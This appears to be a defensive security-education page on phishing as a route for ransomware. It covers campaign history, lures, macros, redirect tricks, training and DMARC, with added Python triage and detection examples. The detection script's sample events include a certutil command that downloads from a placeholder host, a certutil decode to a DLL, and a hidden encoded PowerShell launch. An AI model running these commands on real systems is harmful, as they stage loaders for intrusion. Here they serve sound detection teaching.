Phishing Attacks

Phishing is a problem that’s bigger than ransomware and will be around long after ransomware is finally eradicated.

A Little Background on Phishing Attacks

Much like the credential marketplaces, phishing is a problem that’s bigger than ransomware and will be around long after ransomware is finally eradicated. Phishing takes its name from “fishing,” which metaphorically refers to throwing out bait and seeing what responds. For instance, much phishing consists of sending email or other messages with links that look interesting or important (“Click here if you think this $499 charge is incorrect”), and that lead to installing malware on the victim’s computer. A variant of phishing called “vishing” refers to voice messages sent to victims’ phones.
Phishing attacks have been around since the mid-1990s* (Footnote 1). Today, approximately 3 billion phishing emails are sent per day* (Footnote 2), accounting for about 1% of all email sent* (Footnote 3).
A mere 1% of all email may not sound like a lot, but it's enough to cause a lot of damage. According to the FBI, business email compromise (BEC), which almost always starts with a phishing or vishing attack, cost organizations more than $12 billion between 2013 and 2018* (Footnote 4). In 2020 alone, BEC accounted for $1.8 billion worth of losses* (Footnote 5), and that’s just one type of cybercriminal activity that uses phishing for its attack vector.
As with other parts of this site, covering every aspect of phishing attacks is beyond the scope of a single section. Instead, this page focuses on the role of phishing in the deployment of ransomware.

Spam or Phishing?

Many people use the terms “spam” and “phishing” interchangeably, but there is a difference that’s important to remember. Spam refers to any unwanted email, whereas phishing emails are malicious. A phishing email may try to convince a victim to click on a link, install malicious software, share a username and password, or enable a host of other malicious activities.

The Long History of Phishing and Ransomware

Ransomware and phishing have a long, connected history. One of the ways that GPCode was delivered was through spear phishing campaigns. The attacker scraped job sites for email addresses and sent victims a Trojan disguised as a job application. It was a simple but effective way of targeting victims and spreading ransomware.

Other ransomware actors adopted phishing as a primary delivery method for the ransomware. By including the ransomware as part of an attachment or directing victims to malicious websites that exploit their browsers or browser plug-ins (such as Adobe Flash), these ransomware groups were able to quickly spread their malware. The lures used in these phishing emails are still commonly used today:
Law enforcement
Official government agency communication
Package delivery
Payment due
Received payment
Legal notices
Understanding common lures is important, especially as they evolve over time. Knowing the types of phishing emails that ransomware (and other cybercriminals) like to send allows security teams to better prepare defenses and employees for a phishing campaign.
Ransomware groups send out millions of these emails a month, so they need to infect only a small percentage of recipients to make a good deal of money.

Locky

Locky ransomware took the pairing of ransomware and phishing to the next level. At one point the group behind the Locky ransomware sent out as many as 23 million phishing emails over a 24-hour period. It wasn’t unusual for individual Locky phishing campaigns to be distributed to over 100 million people. The group behind Locky sent out phishing campaigns at volumes unmatched by any ransomware group before or since.
The above screenshot is an example of a typical Locky phishing campaign. Again, it’s not a very sophisticated attack. The email has the subject “documents” with a request to download them and includes an attached .zip file that contains the ransomware. Compressed files were often used in these phishing campaigns, and in fact are still used today, because compressed files often allow the phishing email to bypass any mail security precautions. Many modern ransomware phishing campaigns use password-protected compressed files.

The group behind Locky did more to avoid detection than simply compress files. They had a complex network set up to distribute their phishing attacks. Analysis of two of their campaigns from September of 2017 revealed that:
The phishing emails that purported to be printer output were sent from a total of nearly 120,000 IP addresses from 139 country code top-level domains, according to Comodo. The other phishing email that was utilized in the September Locky campaign was sent from over 12,350 IP addresses in 142 countries. In total, the IP addresses used in the September attacks were scattered across more than half of all countries in the world.

This type of broad, diverse, and continuously changing infrastructure allowed Locky to bypass not just local mail security protection, but external protections such as block lists and real-time blackhole lists (RBLs).

The type of infrastructure required to distribute these large-scale phishing campaigns attracts a lot of attention. Locky was distributed primarily using the Necurs botnet, which at its height had 9 million infected machines under its control. The Necurs botnet was increasingly targeted by network infrastructure and was effectively shut down in early 2019, then taken offline permanently by Microsoft and 35 law enforcement agencies around the world in early 2020.
Although the Locky ransomware is no longer active, many of the lessons learned during its run are still used by both ransomware groups and defenders today.

Getting To Know Evil Corp

E Corp, also known as Evil Corp, is well known to fans of the television show Mr. Robot, but is also the name of the group behind Locky ransomware and many other cybercriminal activities.

Evil Corp started in 2007 by delivering a banking trojan called Cridex. This eventually morphed into Dridex, a modular trojan that can steal banking information, drop a keylogger, and deploy other types of malware. Dridex isn’t used just by Evil Corp to deploy its own malware; it’s also rented out to other cybercriminals.

Locky isn’t the only ransomware deployed by Evil Corp. After Necurs faded away, Evil Corp released the BitPaymer ransomware, which was one of the first ransomware families to rely on Big Game Hunting techniques. Evil Corp is also presumed to be behind the WastedLocker ransomware and Grief ransomware.

One of the reasons that Evil Corp is behind so many different ransomware campaigns is that Evil Corp is one of the few ransomware groups that’s officially sanctioned by the United States government for the development and delivery of the Dridex malware. This means that U.S.-based organizations who pay them a ransom may be sanctioned by the Office of Foreign Assets Control (OFAC). Switching between different ransomware variants gives victims deniability if they have to pay a ransom.

Ransomware and Phishing Today

Phishing attacks are still an important part of ransomware even though ransomware groups no longer send millions of phishing emails at a time. Phishing campaigns delivering ransomware generally use the following techniques:
Microsoft Office Documents with macros
Attached JavaScript or other scripting files

Microsoft Office Macros

The type of phishing attack people are most familiar with is the Microsoft Word attachment, as this technique is widely used across multiple groups. These emails are often labeled “Invoice” or “Past Due,” although ransomware groups have adapted to world events using COVID-19 or Olympics themes as lures, among others.

Macros are tiny bits of code that can be embedded in Microsoft Office documents. They can serve a lot of useful functions, but malicious actors, especially ransomware groups, often use them to deploy malicious payloads. The screenshot to the right is a pretty basic example of an email sent to a victim. The sole purpose is to get the victim to enable macros within Microsoft Word.
Sample of a Word Document used in a ransomware phishing campaign
Macros make for a great initial payload, sometimes referred to as a loader, because there are a lot of legitimate reasons to use macros, so they’re almost always allowed by organizations. This means that macros bypass most security protections that may be in place, even some sandboxing applications.
Microsoft has disabled macros by default in all current versions of Microsoft Office, but that doesn’t mean that phishing campaigns using Microsoft Office documents no longer work. Many people, for a variety of reasons, still need macros for their day-to-day work, so disabling macros across an entire organization is often difficult for IT and security teams to implement, hence the “official looking” notice in the above screenshot asking the victim to enable macros. Of course, macros won’t help anyone view a version of a document created by a newer version of Microsoft Word, but most people won’t know that. Many people, upon seeing this type of notice, will assume it’s legitimate, enable macros, and unknowingly launch a ransomware attack.
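A mail gateway or triage script cannot tell a benign attachment from one that carries a macro by its name alone, but the container itself gives the answer: modern Office files are ZIP archives, and a VBA project is stored as a vbaProject.bin part and declared in [Content_Types].xml. The following added example (not code from the original page or from any product it mentions) checks both indicators and, because a deliberately broken container also deserves a human look, treats an unreadable file as a finding rather than as clean. The sample containers it builds are constructed stand-ins, not real documents.

```python
"""Triage an Office attachment for an embedded VBA macro project.

Added example. OOXML files (.docx/.docm/.xlsm/.pptm) are ZIP containers;
a VBA project is stored in a part named vbaProject.bin and is declared in
[Content_Types].xml with the content type
application/vnd.ms-office.vbaProject. Both indicators are checked here.
"""
import io
import zipfile

VBA_CONTENT_TYPE = "application/vnd.ms-office.vbaProject"


def inspect_office_zip(data: bytes) -> dict:
    """Return which macro indicators are present in an OOXML container."""
    result = {"valid_zip": False, "vba_part": False, "vba_content_type": False}
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            result["valid_zip"] = True
            names = zf.namelist()
            # Any part named vbaProject.bin (under word/, xl/, ppt/ ...) carries VBA.
            result["vba_part"] = any(n.lower().endswith("vbaproject.bin") for n in names)
            if "[Content_Types].xml" in names:
                ctypes = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                result["vba_content_type"] = VBA_CONTENT_TYPE in ctypes
    except zipfile.BadZipFile:
        pass  # not a ZIP at all: reported as 'malformed' below
    return result


def macro_verdict(data: bytes) -> str:
    """Map the indicators to a triage verdict: 'clean', 'macro' or 'malformed'."""
    r = inspect_office_zip(data)
    if not r["valid_zip"]:
        return "malformed"
    if r["vba_part"] or r["vba_content_type"]:
        return "macro"
    return "clean"


def build_sample_docx(with_macro: bool) -> bytes:
    """Construct a minimal OOXML-style container for the demo (not a real document)."""
    buf = io.BytesIO()
    overrides = ""
    if with_macro:
        overrides = (f'<Override PartName="/word/vbaProject.bin" '
                     f'ContentType="{VBA_CONTENT_TYPE}"/>')
    content_types = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
        '<Default Extension="xml" ContentType="application/xml"/>'
        f'{overrides}</Types>'
    )
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", content_types)
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macro:
            # Placeholder bytes standing in for a real OLE-compound VBA project.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    samples = [("invoice.docm", build_sample_docx(True)),
               ("report.docx", build_sample_docx(False)),
               ("broken.docx", b"not a zip at all")]
    for label, blob in samples:
        print(f"{label}: {macro_verdict(blob)}")
```

Because the check reads the container rather than trusting the extension, a macro-bearing file renamed from .docm to .docx is still caught; it does not inspect the VBA code itself, so it is a gate for quarantine or sandboxing, not a malware verdict.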

Macros Still Pose a Real Risk to Security

Despite the best efforts of Microsoft and security professionals around the world, Microsoft Office macros still pose a real risk to security. But macros can be universally disabled using Active Directory Group Policy Objects (GPOs). A GPO allows administrators to apply one security setting across an entire domain. The advantage of using a GPO to disable Microsoft Office macros is that the setting cannot be overridden at the user level, so it allows administrators to protect users from themselves.

The other nice thing about using GPO is that it allows administrators to create separate groups. So, if there are users who need to enable macros, they can be placed in a separate group with permission to open certain macros. This allows them to continue to do their job uninterrupted while keeping the organization safe.

Google Docs

Similar to Office Documents, Google Docs and Google Drive have become an increasingly popular delivery mechanism for phishing emails.
The group behind the Bazar Loader is particularly fond of using Google Docs as lures. Similar to the Microsoft Office-based lures, many of these phishing campaigns involve “Invoice” and “Billing” lures. But, some of the Bazar Loader campaigns can be more personalized, such as telling the victim that they’ve been terminated and asking them to click on a Google Document to find out their severance package.
These campaigns tend to be a little more straightforward. The victim clicks on a legitimate Google Document to find an embedded “PDF” or “Word Document” that needs to be downloaded to view the document. Of course, the link leads not to a PDF or a Word Document but to a malicious executable. The malicious file is often disguised simply by naming it something like invoice.doc.exe and changing its icon to make the file look like a Microsoft Word file.
As an added trick, attackers often use Google Doc redirects to avoid any proxy or sandbox detections. Most security tools that monitor for redirects have a limited number of redirects that they'll follow before they stop checking the links for malicious content. The idea is that they don’t want unlimited redirects eating up resources, effectively overwhelming the platform. Attackers know this, so they sometimes include dozens of redirects to avoid detection.
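Two of the tricks described above, the document-looking filename that ends in an executable extension and the download link buried behind more redirects than a scanner will follow, can both be handled in link triage. The added example below is not code from the original page; its hostnames are placeholders and its redirect map is constructed in memory so that it runs offline, standing in for the HTTP 3xx responses a real checker would receive. The design point it makes is the one the paragraph implies: a chain that is still redirecting when the hop limit is reached is reported as unresolved and treated as suspicious, never counted as clean.

```python
"""Link and attachment triage for phishing lures.

Added example. Flags filenames such as invoice.doc.exe and follows a
redirect chain with a hop limit, failing closed when the limit is hit.
"""
from urllib.parse import urlparse

DOCUMENT_EXTS = {"doc", "docx", "pdf", "xls", "xlsx", "ppt", "pptx", "txt"}
EXECUTABLE_EXTS = {"exe", "scr", "js", "jse", "vbs", "hta", "cmd", "bat", "ps1", "msi", "lnk"}

# Constructed redirect map: each key redirects to its value; a URL absent
# from the map is a final destination. All hosts are placeholders.
REDIRECTS = {
    "https://docs.example.test/d/abc": "https://r1.example.test/x",
    "https://r1.example.test/x": "https://r2.example.test/y",
    "https://r2.example.test/y": "https://cdn.example.test/invoice.doc.exe",
}


def classify_filename(name: str) -> str:
    """'executable' if the last extension runs code, 'disguised-executable'
    when a document extension sits right before it, else 'document' / 'other'."""
    labels = name.lower().split(".")
    if len(labels) < 2:
        return "other"
    final = labels[-1]
    if final in EXECUTABLE_EXTS:
        if len(labels) >= 3 and labels[-2] in DOCUMENT_EXTS:
            return "disguised-executable"
        return "executable"
    if final in DOCUMENT_EXTS:
        return "document"
    return "other"


def resolve_chain(url: str, redirect_map: dict, max_hops: int = 10):
    """Follow redirects up to max_hops. Returns (status, last_url, hops_taken)
    where status is 'resolved', 'loop' or 'unresolved'."""
    seen = [url]
    current = url
    for hop in range(max_hops):
        nxt = redirect_map.get(current)
        if nxt is None:
            return "resolved", current, hop
        if nxt in seen:
            return "loop", nxt, hop + 1
        seen.append(nxt)
        current = nxt
    # Still redirecting after the limit: do not report this as clean.
    return "unresolved", current, max_hops


def link_verdict(url: str, redirect_map: dict, max_hops: int = 10) -> str:
    """Combine chain resolution and final-target filename classification."""
    status, final_url, hops = resolve_chain(url, redirect_map, max_hops)
    if status != "resolved":
        return f"suspicious: chain {status} after {hops} hops"
    filename = urlparse(final_url).path.rsplit("/", 1)[-1]
    kind = classify_filename(filename)
    if kind in ("executable", "disguised-executable"):
        return f"suspicious: final target is {kind} ({filename})"
    return f"ok: {final_url} ({kind})"


def build_long_chain(hops: int, final: str = "https://files.example.test/brochure.pdf") -> dict:
    """Construct a chain of `hops` placeholder redirectors that ends at `final`."""
    chain = {}
    for i in range(hops):
        src = f"https://hop{i}.example.test/r"
        chain[src] = f"https://hop{i + 1}.example.test/r" if i + 1 < hops else final
    return chain


if __name__ == "__main__":
    print(link_verdict("https://docs.example.test/d/abc", REDIRECTS))
    long_chain = build_long_chain(30)
    print(link_verdict("https://hop0.example.test/r", long_chain, max_hops=10))
    print(link_verdict("https://hop0.example.test/r", long_chain, max_hops=50))
```

Raising max_hops is the obvious tuning knob, but the more important choice is the verdict on overflow: an "unresolved" chain should be quarantined or sandboxed with a higher budget, not passed through.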

General Phishing Techniques

Because phishing attacks are so dynamic, quickly switching from lure to lure, many phishing campaigns are built on templates. This allows the ransomware groups to keep the structure of the email and the technology behind it the same, while swapping out the lures for whatever is the trending news topic of the day.
Not just Microsoft and Google services are abused like this; they’re simply the most prominent. Any productivity offering that’s commonly used by organizations can and will be abused in this way. Ransomware actors have used Dropbox, Slack, GitHub, and other services as part of phishing lures. These services work well for ransomware groups and other phishing attacks because they’re unlikely to be blocked and are sometimes on the allow lists of other security tools, such as web proxies and web application firewalls.

Phishing for Harvesting Purposes

Although the focus of this page is on ransomware delivered via phishing, a lot of these same techniques are used in phishing campaigns designed to harvest credentials. Although these campaigns don’t directly deliver ransomware, the harvested credentials can be used in ransomware attacks later.
Credential harvesting databases have to be sold somewhere, as discussed on the "Credential Markets and Initial Access Brokers" page. More than 70% of all phishing campaigns in 2020 were credential harvesting attacks, and Kaspersky alone identified more than 434 million phishing emails. That means there were potentially hundreds of millions of credentials harvested and placed for sale on underground forums. Cybercriminal groups often engage in multiple types of illegal activity, so it’s possible that credentials taken by one arm of a cybercriminal group won’t be sold, but instead will be used by the branch of the group launching ransomware attacks.
This is why it’s so important to monitor for and stop all phishing campaigns, not just those delivering ransomware.


The Payload

Ransomware phishing attacks don’t usually deliver ransomware. Instead, they deliver a payload that allows the ransomware attacker to start reconnaissance of the organization.
The initial payload is often a simple PowerShell script that does a quick survey of the first machine and pulls down a loader, such as Trickbot, that the attackers can use to gain hands-on-keyboard access.

Many ransomware affiliates have carried out such attacks dozens of times, and ransomware groups as a whole have done them hundreds or thousands of times, so they possess a lot of collective experience in avoiding detection mechanisms.
Whenever possible, ransomware groups use common system administration tools during this phase to avoid detection. One example is Certutil, which is a Microsoft tool used to download, manage, and install certificates. It turns out that Certutil can also be used to load the Trickbot DLL into memory, usually allowing it to avoid detection by endpoint protection solutions.
By using these types of loaders or droppers and installing these initial access tools in memory, the ransomware attacker can survey the network, ensure they haven’t inadvertently landed in a honeypot, disable tools that might detect their activity, and download the tools needed for the next phase, which is discussed on the "Honeypots and Honeyfiles" page.
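Because the loader stage leans on built-in tools, the detection opportunity is in how those tools are invoked rather than in which binary runs. The added example below (not code from the original page) runs a few command-line rules over constructed, Sysmon-style process-creation events: Certutil fetching from a URL or decoding a file, and PowerShell launched hidden with an encoded command, with the severity raised when the parent process is an Office application, which is exactly the macro-to-loader path described earlier on this page. The events, hostnames, and the rule set are all constructed for the demo; the command-line switches themselves are documented Certutil and PowerShell options.

```python
"""Detect living-off-the-land loader activity in process-creation telemetry.

Added example. Events and rules are constructed for the demo; field names
follow the Sysmon Event ID 1 layout loosely (host, user, parent, image,
cmdline) but are not real telemetry.
"""
import re

# Constructed events: one Certutil download from a Word-spawned shell, one
# Certutil decode, one legitimate Certutil use on a PKI server, one hidden
# encoded PowerShell launch, and one benign process.
SAMPLE_EVENTS = [
    {"host": "WS-0412", "user": "jdoe", "parent": "WINWORD.EXE",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -urlcache -split -f http://placeholder.invalid/inv.txt C:\\Users\\Public\\inv.txt"},
    {"host": "WS-0412", "user": "jdoe", "parent": "cmd.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -decode C:\\Users\\Public\\inv.txt C:\\Users\\Public\\inv.dll"},
    {"host": "SRV-PKI01", "user": "pkiadmin", "parent": "mmc.exe",
     "image": "C:\\Windows\\System32\\certutil.exe",
     "cmdline": "certutil.exe -addstore Root C:\\certs\\corp-root.cer"},
    {"host": "WS-0788", "user": "asmith", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "cmdline": "powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA"},
    {"host": "WS-0788", "user": "asmith", "parent": "explorer.exe",
     "image": "C:\\Windows\\System32\\notepad.exe",
     "cmdline": "notepad.exe C:\\Users\\asmith\\notes.txt"},
]

# Each rule: image pattern, required command-line pattern, optional second
# pattern that must also match, and a base severity.
RULES = [
    {"name": "certutil_download", "severity": "high",
     "image": r"\\certutil\.exe$", "cmdline": r"-urlcache\b", "extra": r"https?://"},
    {"name": "certutil_decode", "severity": "medium",
     "image": r"\\certutil\.exe$", "cmdline": r"-decode(hex)?\b", "extra": None},
    {"name": "powershell_hidden_encoded", "severity": "high",
     "image": r"\\powershell\.exe$", "cmdline": r"-(e|ec|enc|encodedcommand)\b",
     "extra": r"-w(indowstyle)?\s+hidden"},
]
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def match_rules(event: dict) -> list:
    """Return the names of all rules the event satisfies (case-insensitive)."""
    hits = []
    for rule in RULES:
        if not re.search(rule["image"], event["image"], re.I):
            continue
        cmd = event["cmdline"]
        if not re.search(rule["cmdline"], cmd, re.I):
            continue
        if rule["extra"] and not re.search(rule["extra"], cmd, re.I):
            continue
        hits.append(rule["name"])
    return hits


def triage(events: list) -> list:
    """Turn matching events into alerts; an Office parent bumps severity one level."""
    by_name = {r["name"]: r["severity"] for r in RULES}
    alerts = []
    for ev in events:
        hits = match_rules(ev)
        if not hits:
            continue
        rank = max(SEVERITY_RANK[by_name[h]] for h in hits)
        office_spawned = ev["parent"].lower() in OFFICE_PARENTS
        if office_spawned:
            rank = min(rank + 1, SEVERITY_RANK["critical"])
        severity = next(k for k, v in SEVERITY_RANK.items() if v == rank)
        alerts.append({"host": ev["host"], "user": ev["user"], "rules": hits,
                       "severity": severity, "office_spawned": office_spawned})
    return alerts


if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

The PKI server's -addstore call produces no alert, which is the point of matching on switches and URLs instead of on certutil.exe itself; in a real deployment the parent-process bump would be joined with the user's role and the host's expected workload to keep the Certutil rules from paging on administrators.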

Conducting Proper Phishing Training

There is a school of thought in information security claiming that phishing training doesn’t work. According to the TerraNova 2020 Gone Phishing Tournament Report, even after phishing training, many organizations still had a 20% click-through rate on simulated phishing exercises.
Part of the problem is that many phishing training programs are outdated and static, contrasted with how dynamic and agile the threat actors are when launching phishing campaigns. Some of the challenge originates from the tendency of many organizations to see security awareness training (of which phishing training is usually a part) as a function of compliance rather than security. Organizations that want to be able to check a box, rather than truly educate employees, are going to keep the training as simple and cost-effective as possible.

For phishing training to be effective, it has to properly reflect the real world and current phishing campaigns. Offering suggestions like “look for grammatical mistakes” reflects an outdated knowledge of modern phishing campaigns.
The most effective phishing training takes place multiple times a year and is personalized to the organization’s environment, even ideally to the individual users. (Simulation campaigns can be adjusted based on the reaction of each individual user.) These campaigns should ideally be conducted by an outside vendor with input from the security and compliance teams. To put it bluntly, most organizations don’t have the expertise, staff, or time to run an effective phishing simulation campaign on their own. Better to let experts do it.

Reporting Is Key

In addition to regular training, organizations have to make it easier to report suspected phishing emails. Provide a centralized email address or a “click button” where employees who suspect they've received a phishing email can quickly report a suspected phishing campaign. This makes employees feel that they’re part of the security campaign.

The counterpart to a reporting process is having IT or security personnel on the other side of that reporting feature who respond to those reports, and do so in a timely fashion. A reporting solution doesn’t work well if an employee has to wait three days to hear back or, worse, never receives any response. When an employee reports a phishing email, it’s important to respond quickly, thanking them for their report and explaining why an email message is or isn’t a phishing message. This allows the employee to understand that they’re an important part of the security process and encourages learning, as well as more reporting.

Don’t Forget the Technical Solution

Phishing training is never enough.

Not even the best phishing training solution claims that it will get click-through rates down to zero. There will always be someone who clicks on a phishing email. Perhaps they’re having a bad day and are in a hurry, or a lure is one that they're particularly susceptible to, or the phishing campaign is simply a really good one. Whatever the reason, no one person or organization is completely immune to phishing attacks.
That’s why phishing training isn’t enough. Organizations have to invest heavily to prevent phishing emails from making it through to employees. This means investing in security tools that stop phishing attacks at the edge. The good news is that improving email security doesn’t always mean investing in new hardware or software solutions. Many organizations already have email security solutions in place, but not every feature has been enabled. Especially if a mail security solution has been in place for several years, it’s a good idea to conduct an audit to see whether there are features not yet enabled that can improve security.

At a minimum, every organization should enable Domain-based Message Authentication, Reporting and Conformance (DMARC). DMARC gives third parties the ability to confirm that emails purported to be from an organization are really from that organization. Almost all phishing emails at this point fail DMARC verification, so organizations can flag email messages that fail DMARC checks to be quarantined and reviewed manually. A word of warning, however: Adoption of DMARC has been slow, so your checks might throw a lot of legitimate messages into quarantine. Luckily, adoption of DMARC is picking up.
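The quarantine warning above follows directly from how a DMARC verdict is computed: a message passes only if SPF or DKIM passes with a domain aligned to the visible From: domain, and a legitimate sender that was never set up for alignment fails exactly like a spoof. The added example below (not code from the original page) parses a DMARC TXT record with the RFC 7489 defaults, decides a message's disposition from constructed authentication results, and lists the record settings that decide how many of those failures actually hit the quarantine. Domains are placeholders, and organizational-domain alignment is approximated by comparing the last two labels; a production checker uses the Public Suffix List instead.

```python
"""Parse a DMARC record and decide a message's disposition.

Added example. Records, domains and authentication results are constructed.
Organizational domain is approximated as the last two labels (a
simplification; real receivers consult the Public Suffix List).
"""


def parse_dmarc(txt: str) -> dict:
    """Parse 'v=DMARC1; p=...; ...' into a tag dict with RFC 7489 defaults applied."""
    tags = {}
    for part in txt.split(";"):
        if "=" in part:
            k, v = part.split("=", 1)
            tags[k.strip().lower()] = v.strip()
    if tags.get("v", "").upper() != "DMARC1":
        raise ValueError("not a DMARC record")
    if "p" not in tags:
        raise ValueError("DMARC record lacks the required p= tag")
    tags.setdefault("adkim", "r")   # relaxed DKIM alignment by default
    tags.setdefault("aspf", "r")    # relaxed SPF alignment by default
    tags.setdefault("pct", "100")   # policy applies to all failing mail by default
    return tags


def org_domain(domain: str) -> str:
    """Simplified organizational domain: the last two labels."""
    return ".".join(domain.lower().rstrip(".").split(".")[-2:])


def aligned(from_domain: str, auth_domain: str, mode: str) -> bool:
    """Strict ('s') alignment needs an exact match; relaxed ('r') needs the same org domain."""
    a, b = from_domain.lower().rstrip("."), auth_domain.lower().rstrip(".")
    return a == b if mode == "s" else org_domain(a) == org_domain(b)


def dmarc_disposition(record: str, from_domain: str,
                      spf_pass: bool, spf_domain: str,
                      dkim_pass: bool, dkim_domain: str) -> str:
    """Return 'pass', or the policy action ('none', 'quarantine', 'reject') to apply."""
    tags = parse_dmarc(record)
    spf_ok = spf_pass and aligned(from_domain, spf_domain, tags["aspf"])
    dkim_ok = dkim_pass and aligned(from_domain, dkim_domain, tags["adkim"])
    if spf_ok or dkim_ok:
        return "pass"
    # sp= (if present) governs subdomains of the organizational domain; p= governs the rest.
    policy = tags["p"]
    if from_domain.lower() != org_domain(from_domain) and "sp" in tags:
        policy = tags["sp"]
    return policy


def record_findings(record: str) -> list:
    """Settings that determine how much failing mail a receiver will actually act on."""
    tags = parse_dmarc(record)
    findings = []
    if tags["p"] == "none":
        findings.append("p=none: monitoring only, failing mail is still delivered")
    if "rua" not in tags:
        findings.append("no rua= address: no aggregate reports to find legitimate senders before enforcing")
    if tags["pct"] != "100":
        findings.append(f"pct={tags['pct']}: policy applied to only that share of failing mail")
    return findings


# Constructed record for the placeholder domain example.test.
RECORD = "v=DMARC1; p=quarantine; sp=none; rua=mailto:dmarc-reports@example.test"

if __name__ == "__main__":
    # Spoof: SPF passes for the sender's own domain, but nothing aligns with example.test.
    print(dmarc_disposition(RECORD, "example.test", True, "bulk-sender.invalid", False, ""))
    # Forwarded legitimate mail: SPF broke in transit, DKIM still aligns.
    print(dmarc_disposition(RECORD, "example.test", False, "forwarder.invalid", True, "example.test"))
    # Legitimate subdomain sender not yet aligned: sp=none keeps it out of quarantine.
    print(dmarc_disposition(RECORD, "news.example.test", True, "bulk.invalid", False, ""))
    print(record_findings("v=DMARC1; p=none"))
```

The usual rollout that avoids the quarantine flood is visible in the record tags: publish p=none with an rua= address first, use the aggregate reports to find every legitimate sender and get it aligned, then move to quarantine and finally reject, optionally ramping with pct.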
Phishing attacks aren’t going away any time soon, so organizations must be vigilant and adapt to these attacks as they continue to evolve.

This site is adapted from the book Ransomware: Understand. Prevent. Recover.